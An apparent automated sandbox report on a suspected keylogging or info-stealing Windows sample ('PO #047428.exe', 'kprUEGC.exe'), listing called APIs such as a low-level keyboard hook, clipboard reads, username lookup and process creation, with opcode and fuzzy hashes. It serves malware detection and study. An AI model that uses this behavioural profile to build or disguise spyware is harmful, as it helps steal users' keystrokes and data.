Memory Dump Source

Source File: 00000000.00000002.254164844.0000000000E1D000.00000040.00000001.sdmp, Offset: 00E1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c517b8ba45d1e2929614d698214ab825dac66b33146744d34600cd2f934c8ffe
Instruction ID: f07f49f9c161ba4999149c1817d81131d066724a4732aa1c04ba1120dda31ae0
Opcode Fuzzy Hash: c517b8ba45d1e2929614d698214ab825dac66b33146744d34600cd2f934c8ffe
Instruction Fuzzy Hash: 3401F27240C3449AE7108A25DC84BE6FB98EF51378F18955BEE096B2C2C37898C4C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1D730, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254164844.0000000000E1D000.00000040.00000001.sdmp, Offset: 00E1D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160bebbebff34a48fd06c87df291572ecfec6104cbf190fbc0226235a8560ed8
Instruction ID: 4d9f0de5b52b9a1fab147b912e60c901a5405c4ce998196890ce803353ba7bda
Opcode Fuzzy Hash: 160bebbebff34a48fd06c87df291572ecfec6104cbf190fbc0226235a8560ed8
Instruction Fuzzy Hash: F7F062724082849AE7108A15DD84BA2FB98EB95778F18C55AED085B686C378AC84CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F8E798, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d638250c701990d3c47f90fc4b20aafd0a6b8cb8e7e48507936c6fa525b9ed43
Instruction ID: 0331c3a52583140b4047ecd8a938dfcf2a4533823ae653485419223480a545bb
Opcode Fuzzy Hash: d638250c701990d3c47f90fc4b20aafd0a6b8cb8e7e48507936c6fa525b9ed43
Instruction Fuzzy Hash: CA12A2B14217468AE730CF65ED9B19D3FA1B745328FA04209E2656EAD1DBBC114BCF8C

Uniqueness

Uniqueness Score: -1.00%

Function 00F8C434, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.254268567.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b5e0c69f552de1781a13a2e055378af08785a55821af04bed6739b07be71b23
Instruction ID: 1595a5e15324fa74a14ea97bb1f41c2a39ad14b905500dc072850ef7e254ac6b
Opcode Fuzzy Hash: 1b5e0c69f552de1781a13a2e055378af08785a55821af04bed6739b07be71b23
Instruction Fuzzy Hash: 6FA19032E002198FCF15EFA5C8445DEBBB2FF85310B25856AE805BB261EB75E945DF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO #047428.exe PID: 6268 Parent PID: 4616 PO #047428.exeCOMMON

Executed Functions

Function 062D4FFC, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 062DB61B

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ae96d0ed24c3d696050d0eaf5b782bc1af7e3463e31f9e4625d34162dd4d1002
Instruction ID: f67537078889b04750510c7e925a5b478aeef101479369b86e419b401d43654d
Opcode Fuzzy Hash: ae96d0ed24c3d696050d0eaf5b782bc1af7e3463e31f9e4625d34162dd4d1002
Instruction Fuzzy Hash: 415154B0D202198FDB54CFA9C898BDDBBB1FF48315F168529E815AB350D7B4A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 015FA238, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 015FFE93

Memory Dump Source

Source File: 00000004.00000002.623161108.00000000015F0000.00000040.00000001.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 48a9ce963784f59bd76fb5eb25812b97b124abcd4bae611b16318c019f12f7db
Instruction ID: 4de51768b612c5f986f081bf0e8ecf2667ac8781fa658edfd030f36f1f93a61a
Opcode Fuzzy Hash: 48a9ce963784f59bd76fb5eb25812b97b124abcd4bae611b16318c019f12f7db
Instruction Fuzzy Hash: 162138719002088FCB60DF99D844BEEFBF5FB88324F04882AE515A7740CB74A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01703E58, Relevance: 1.8, APIs: 1, Instructions: 283COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01704216

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 83b41a63ef81211e964a478c0c1797ca406e12662b33069c867f46d2afaa5eeb
Instruction ID: d412029151f69858b827c4495d9116058ba442b57ede54567129cc76805f507d
Opcode Fuzzy Hash: 83b41a63ef81211e964a478c0c1797ca406e12662b33069c867f46d2afaa5eeb
Instruction Fuzzy Hash: 47B17E70A007058FCB15EF69C89466EBBF2FF88204B10896DD50AEB795DB74E806CB90

Uniqueness

Uniqueness Score: -1.00%

Function 062DB4D4, Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 062DB61B

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 526fc638a689db41c141efe052b26f760653793070e882a83ee3045da6f333fa
Instruction ID: 0415f29dc50a040e6957f5669a6e40f704182f98d0674680193c5499308b8eb9
Opcode Fuzzy Hash: 526fc638a689db41c141efe052b26f760653793070e882a83ee3045da6f333fa
Instruction Fuzzy Hash: 975143B0D202198FDB14CFA9C898BDDFBB1BF48315F16852AE815AB350D7B4A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 062D92B4, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 062DB61B

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fb8f61d8f52d1f152b5caa13c2bb36c373defbb6b7fe20bd67b0f1d9b2d20985
Instruction ID: 7dc36f518a262902868338f49ff894cab69ddf3029c7437e9c577a0d1990c044
Opcode Fuzzy Hash: fb8f61d8f52d1f152b5caa13c2bb36c373defbb6b7fe20bd67b0f1d9b2d20985
Instruction Fuzzy Hash: 785133B0D202198FDB54CFA9C898BDDBBB1FF48315F168529E815AB390D7B4A844CF94

Uniqueness

Uniqueness Score: -1.00%

Function 015FED08, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.623161108.00000000015F0000.00000040.00000001.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368365f2d950fa9b36c98b7213ef8c71930ef6b5fe93a8a7a64a2ba5e0b79270
Instruction ID: 23a324b8a27824db01c4c011527b154ee40811380cf94edbc3379b1c75ea28b2
Opcode Fuzzy Hash: 368365f2d950fa9b36c98b7213ef8c71930ef6b5fe93a8a7a64a2ba5e0b79270
Instruction Fuzzy Hash: 0C413132D083458FCB14DF79D8006EEBBF1EF89220F16896EC604AB651DB389885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01703C7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017052A2

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 70c871f1f5f1cc5fe88aac383edc3d2fc44afc066d44999832c51dcd41834cfc
Instruction ID: f47571e2f58639a459c14412af015e902100fd54b907bf2aa1d602c35d817215
Opcode Fuzzy Hash: 70c871f1f5f1cc5fe88aac383edc3d2fc44afc066d44999832c51dcd41834cfc
Instruction Fuzzy Hash: A351DCB1D04308DFDB15CF99C884ADEFBB5BF48314F64852AE818AB250D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01705184, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 017052A2

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9dad04a4e641ef2f5fb4eeea302b8688a1576e615dfee13289d5880eeb253775
Instruction ID: a516e5ed0b651509d0e7cd0ee7ec0f6665fb1a084c93d7496d73bd734cd21602
Opcode Fuzzy Hash: 9dad04a4e641ef2f5fb4eeea302b8688a1576e615dfee13289d5880eeb253775
Instruction Fuzzy Hash: 1951CCB1D10309DFDB15CFA9D984ADEFBB1BF48314F64852AE818AB250D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01706964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 01707D01

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: f5316dc68bb11bec735d4d64ba5dd3632cf54f4b024577a3a46dfc58ad9d422e
Instruction ID: 390d25ee96827b2a90d16a1ebfb731c858851d03e36a892d5782ddab55830bfb
Opcode Fuzzy Hash: f5316dc68bb11bec735d4d64ba5dd3632cf54f4b024577a3a46dfc58ad9d422e
Instruction Fuzzy Hash: 934149B9900349CFDB15CF59C488BABFBF9FB88314F148459E519AB361D774A841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 062DB931, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 062DBA00

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 22477d87c4be7f46721588e3e2770d7343b4c7f3bec8e386b2727a6635ee8bc1
Instruction ID: ab790698bd2e3d72573e4dbc542f8b8e7aba266d969aabd0987f65c5d9d7026c
Opcode Fuzzy Hash: 22477d87c4be7f46721588e3e2770d7343b4c7f3bec8e386b2727a6635ee8bc1
Instruction Fuzzy Hash: 9431BEB1E0434A9FCB00CF69C405BEEBBF4AF49310F06C06AE854AB341D738A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 062DCC85, Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 062DCD18

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: c174f031cfaf123b94596e18919fb20e51760f6ee0770dac741e1d5395c8b878
Instruction ID: c38fb78b011eafb891c9a8de2e5ad21921e1b29ad2c425f02d37ab3c361fb7e9
Opcode Fuzzy Hash: c174f031cfaf123b94596e18919fb20e51760f6ee0770dac741e1d5395c8b878
Instruction Fuzzy Hash: EE3103B0E10208DFDB10DFA9D988BDEBFF5AF49314F248429E404AB390D7746945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0170C3C9, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0170C452

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2556b999cdc227f00a9feb1c3c2add9343f9fa00e904900f81cab364b16497b3
Instruction ID: 7491155a43d7aed34701954b632faec29f388a0b8756c8ae9af5aacc9ac1fd57
Opcode Fuzzy Hash: 2556b999cdc227f00a9feb1c3c2add9343f9fa00e904900f81cab364b16497b3
Instruction Fuzzy Hash: 4F31CFB5805345CFEB22DFA8D5093AEBFF4BB06314F14449AE449A7282C7796509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 062DC618, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 062DCD18

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 9a5a9df78d51ee5bf05013548a581478ccf45b2e78517f58871322293dc6bcfb
Instruction ID: 4456d3551f5c65e49cb85548d8a4089e2041f0bf0b0b163fd8db9fe15d231be7
Opcode Fuzzy Hash: 9a5a9df78d51ee5bf05013548a581478ccf45b2e78517f58871322293dc6bcfb
Instruction Fuzzy Hash: 593116B0E14208DFDB10DF99C988BDDBBF5AF49314F148429E404BB390D7B46945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 062DBF90, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,062DBF7F), ref: 062DC01F

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 233abe1e0943ba4691c65166a75a4b5545841e2a38d5ed6410d2afa4ba52bf30
Instruction ID: 6ad06fdabcea13535820e8a13ba60b80ac0ce77c00daa29f565a98a43c55f1b1
Opcode Fuzzy Hash: 233abe1e0943ba4691c65166a75a4b5545841e2a38d5ed6410d2afa4ba52bf30
Instruction Fuzzy Hash: 4321ACB48083499FCB10CFA9C844BDFBBF8AF5A364F15404AE854A7210C334A844CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01706718, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01706D3E,?,?,?,?,?), ref: 01706DFF

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 21ef2b25dad05c0dba609525ad5fe05901c0fd3d5bc2c78dfa31df2a0617605b
Instruction ID: 27f2cf6ae5eed1ad7b2b25818c27f54fc0e724cf52f19fe0db4d3f50251a2335
Opcode Fuzzy Hash: 21ef2b25dad05c0dba609525ad5fe05901c0fd3d5bc2c78dfa31df2a0617605b
Instruction Fuzzy Hash: 3421D2B5900348AFDB10DFA9D484AEEFBF4FB48324F14841AE914A7350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01706D72, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01706D3E,?,?,?,?,?), ref: 01706DFF

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f8c90e5a1ddeb43513633179c7d2ac08e1e8396e7fdf474ed7cec213e2a49a5a
Instruction ID: 55df24a3d0973011611dafc15c86eb44c5bb477d38615e18255c7e87e9a66eb0
Opcode Fuzzy Hash: f8c90e5a1ddeb43513633179c7d2ac08e1e8396e7fdf474ed7cec213e2a49a5a
Instruction Fuzzy Hash: DC21E0B5900208AFDB10DFA9D884ADEFBF8FB48324F14841AE914A7350D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015FFE10, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 015FFE93

Memory Dump Source

Source File: 00000004.00000002.623161108.00000000015F0000.00000040.00000001.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 163580d7eed850b504e6942202b1bf499b6324cb15b9c7d76c8ca5d7638b5e30
Instruction ID: fcdea7632626be9d5ad954a58e417570cf2cd89229cccfa87fb5c1476e3f687a
Opcode Fuzzy Hash: 163580d7eed850b504e6942202b1bf499b6324cb15b9c7d76c8ca5d7638b5e30
Instruction Fuzzy Hash: EF2137719042098FCB64CFA9D844BEEFBF5BB88314F14882ED555A7650C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 062D92C0, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 062DBA00

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5d56df133ff68d1f2566bc2ec8a36265e9d2a4f33fcaa8997a0d3c2469f4006a
Instruction ID: ca62db7c3efc3ce9cc993245f58e105ab05806c7a66a2c5a97ca42a36f1eadba
Opcode Fuzzy Hash: 5d56df133ff68d1f2566bc2ec8a36265e9d2a4f33fcaa8997a0d3c2469f4006a
Instruction Fuzzy Hash: 1A2153B1C0061A9BCB10CF9AD4447EEFBB4FB48324F05812AE818B7240D738A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 015FEDD8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015FED5A), ref: 015FEE47

Memory Dump Source

Source File: 00000004.00000002.623161108.00000000015F0000.00000040.00000001.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c4eef252e5e6841795f1aa2c280a958818d37e3b238ea0a0875d0e4d5121b97a
Instruction ID: 580f2f2aecd47ebd677a21d267aa677a12cf17388df00d3f069df604d5bb627f
Opcode Fuzzy Hash: c4eef252e5e6841795f1aa2c280a958818d37e3b238ea0a0875d0e4d5121b97a
Instruction Fuzzy Hash: A821E0B1C006199FCB10DF9AD444BDEFBB4BB48224F15852AD914A7250D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015FA1F0, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015FED5A), ref: 015FEE47

Memory Dump Source

Source File: 00000004.00000002.623161108.00000000015F0000.00000040.00000001.sdmp, Offset: 015F0000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 3d068d037c3b9c0108521f7ded42c4b8c8ccff0260fc0a93b03edf49a5ece8ab
Instruction ID: 565d2ebb0f2db49305d5ade5f605960ec6bf7ace10c2153ade8e7a665948aa39
Opcode Fuzzy Hash: 3d068d037c3b9c0108521f7ded42c4b8c8ccff0260fc0a93b03edf49a5ece8ab
Instruction Fuzzy Hash: 3C1130B2C002199BCB10DF9AD444BDEFBF4FB48224F05852AEA18B7240D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0170C3D8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0170C452

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 1ad8933b66cd8a4b0879a83319f327b5230e04ac9bc932f4339ecdbef20e095b
Instruction ID: dbcde1db80e0e93ce272134fe73fee28b85a50256820e277eaf2a2a211620682
Opcode Fuzzy Hash: 1ad8933b66cd8a4b0879a83319f327b5230e04ac9bc932f4339ecdbef20e095b
Instruction Fuzzy Hash: 8D118CB19003058FDB21EFA9D5487AEBFF4FB45314F14846AE809A7640DB386448CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01702F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01704216

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3462d76023792cc035913800de773c15edefb399aab599f4f43b69487dd18f1f
Instruction ID: 7497607d43c5b9e474911ce2cb3b3b5d25aca4c01e7b1af1b06b5d21c0368b40
Opcode Fuzzy Hash: 3462d76023792cc035913800de773c15edefb399aab599f4f43b69487dd18f1f
Instruction Fuzzy Hash: C11120B5900349CBDB20DF9AD448BDEFBF4EB89224F04842AD929B7200C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 062D9304, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,062DBF7F), ref: 062DC01F

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: af9a43ed30737431f1aa5b0b0714736d42e9a77a5eeee7bf4c91a30c240a0939
Instruction ID: 5c5b634df87811c850ff21dadce54f7ded648f1f6d48625a4c68494dfc05a7e6
Opcode Fuzzy Hash: af9a43ed30737431f1aa5b0b0714736d42e9a77a5eeee7bf4c91a30c240a0939
Instruction Fuzzy Hash: 641136B19042098FCB20DF99D8887DEFBF8EB99364F15841AD919A7300D774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 017041AA, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01704216

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: eb840ddbc9a80aa185dcfd2fa8b69067b5bc978791feb7cbd5635fd1fc28dba8
Instruction ID: 7513822b9a0b70c23d9fd9bbf30caa2b24e713d53d508ade814a9d7fc7910de8
Opcode Fuzzy Hash: eb840ddbc9a80aa185dcfd2fa8b69067b5bc978791feb7cbd5635fd1fc28dba8
Instruction Fuzzy Hash: CC1102B6D003498FDB10DF9AD844BDEFBF4EB89224F15841AD919B7640C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 062DC504, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 062DCB9D

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6c36ff792ef9cdde82ada477eb0ee2fb766974d55fd63130a43ad878ff822b87
Instruction ID: f830521c7aad6bcea1b29a30243341cd4731779eb01f117edd020ed343093bad
Opcode Fuzzy Hash: 6c36ff792ef9cdde82ada477eb0ee2fb766974d55fd63130a43ad878ff822b87
Instruction Fuzzy Hash: C71145B19042088FCB20DF99D448BDEFBF8EB48324F14881AE918A3340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 062DCB40, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 062DCB9D

Memory Dump Source

Source File: 00000004.00000002.629579891.00000000062D0000.00000040.00000001.sdmp, Offset: 062D0000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 25a2234e05b29caf66f1524123ba4165c0c0d0647503b7299b871cb9993bce20
Instruction ID: b016ec35728acd2825e090191a87925e9a734df7f5ade0197a26acb46ba152f2
Opcode Fuzzy Hash: 25a2234e05b29caf66f1524123ba4165c0c0d0647503b7299b871cb9993bce20
Instruction Fuzzy Hash: 581145B59003488FCB20DFA9D448BCEFFF8EB49324F14845AE818A3240C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01704180, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01704216

Memory Dump Source

Source File: 00000004.00000002.623998128.0000000001700000.00000040.00000001.sdmp, Offset: 01700000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4cffd301608d0b16642ce18a3f30f4d30765419255805a75081dbe56fb6ebcb0
Instruction ID: 0fb89d19ce58aef0bfb301ecf22e00375d5fb02c37fa0dfc4ea0e1888e3d4347
Opcode Fuzzy Hash: 4cffd301608d0b16642ce18a3f30f4d30765419255805a75081dbe56fb6ebcb0
Instruction Fuzzy Hash: 15118BF5904744CFDB11DF9AD440389FBF0EF99318F24819AC549A7292D3359446CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0165D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.623571162.000000000165D000.00000040.00000001.sdmp, Offset: 0165D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e1910981b233b73a2c5e1c9cd930a75d348b95ba23c8c81099494722649f17
Instruction ID: 230bfd759c2e3cf475e826e3d89ed1ed3e73b36c427af64c446949c574fa0c16
Opcode Fuzzy Hash: 46e1910981b233b73a2c5e1c9cd930a75d348b95ba23c8c81099494722649f17
Instruction Fuzzy Hash: C02122B1508240DFDB55CF54D8C4B26BB61FB84364F24C969ED0A4B386C33AD847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0165D005, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.623571162.000000000165D000.00000040.00000001.sdmp, Offset: 0165D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aeaf29c3d00fc3bd7816e937a855b39c55b30ff4d1f553caee8c31b68d4e42d
Instruction ID: a59ab940713f48e246e69055edf4ecf0a82ce6b5e1868abfc27d7f840a887b8e
Opcode Fuzzy Hash: 1aeaf29c3d00fc3bd7816e937a855b39c55b30ff4d1f553caee8c31b68d4e42d
Instruction Fuzzy Hash: 27218E755083809FDB02CF24D994B15BF71EB46214F28C5EAD8498B2A7C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: kprUEGC.exe PID: 5548 Parent PID: 3472 kprUEGC.exeCOMMON

Executed Functions

Function 07437CB8, Relevance: 1.7, APIs: 1, Instructions: 157processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 07437E2B

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9d63fc2fd432461229f94d7d8c6de8e9af85bd5a86fdffbb7f3d7e2dd2c96d24
Instruction ID: ad4c8ebdc58d06b8912034d393042dde3b3972a6f2fe64283fdcd0417c59f2d0
Opcode Fuzzy Hash: 9d63fc2fd432461229f94d7d8c6de8e9af85bd5a86fdffbb7f3d7e2dd2c96d24
Instruction Fuzzy Hash: 2D5159B1905329DFDB21CF99C880BDEBBB1BF48314F15859AE948B7210CB315A89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07437CD8, Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 07437E2B

Memory Dump Source

Source File: 0000000E.00000002.345124452.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 864dd6abf0875a55350e6d3879f971a935824394b410034e7e0afa20dbfbf300
Instruction ID: 406fa047b6dfb72c3ecdee1d4917bc34a50cafac71b69f81bf8fe9ec7116d96b
Opcode Fuzzy Hash: 864dd6abf0875a55350e6d3879f971a935824394b410034e7e0afa20dbfbf300
Instruction Fuzzy Hash: 5A5127B1900329DFDB61CF99C884BDEBBB2BF48314F15859AE948B7250CB315A89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 058E0006, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058E0152

Memory Dump Source

Source File: 0000000E.00000002.342919343.00000000058E0000.00000040.00000001.sdmp, Offset: 058E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b6afb8cd195ccc8b61f2321c1fab706b35d5df9bdf1a2e94bd1106b7a7e52486
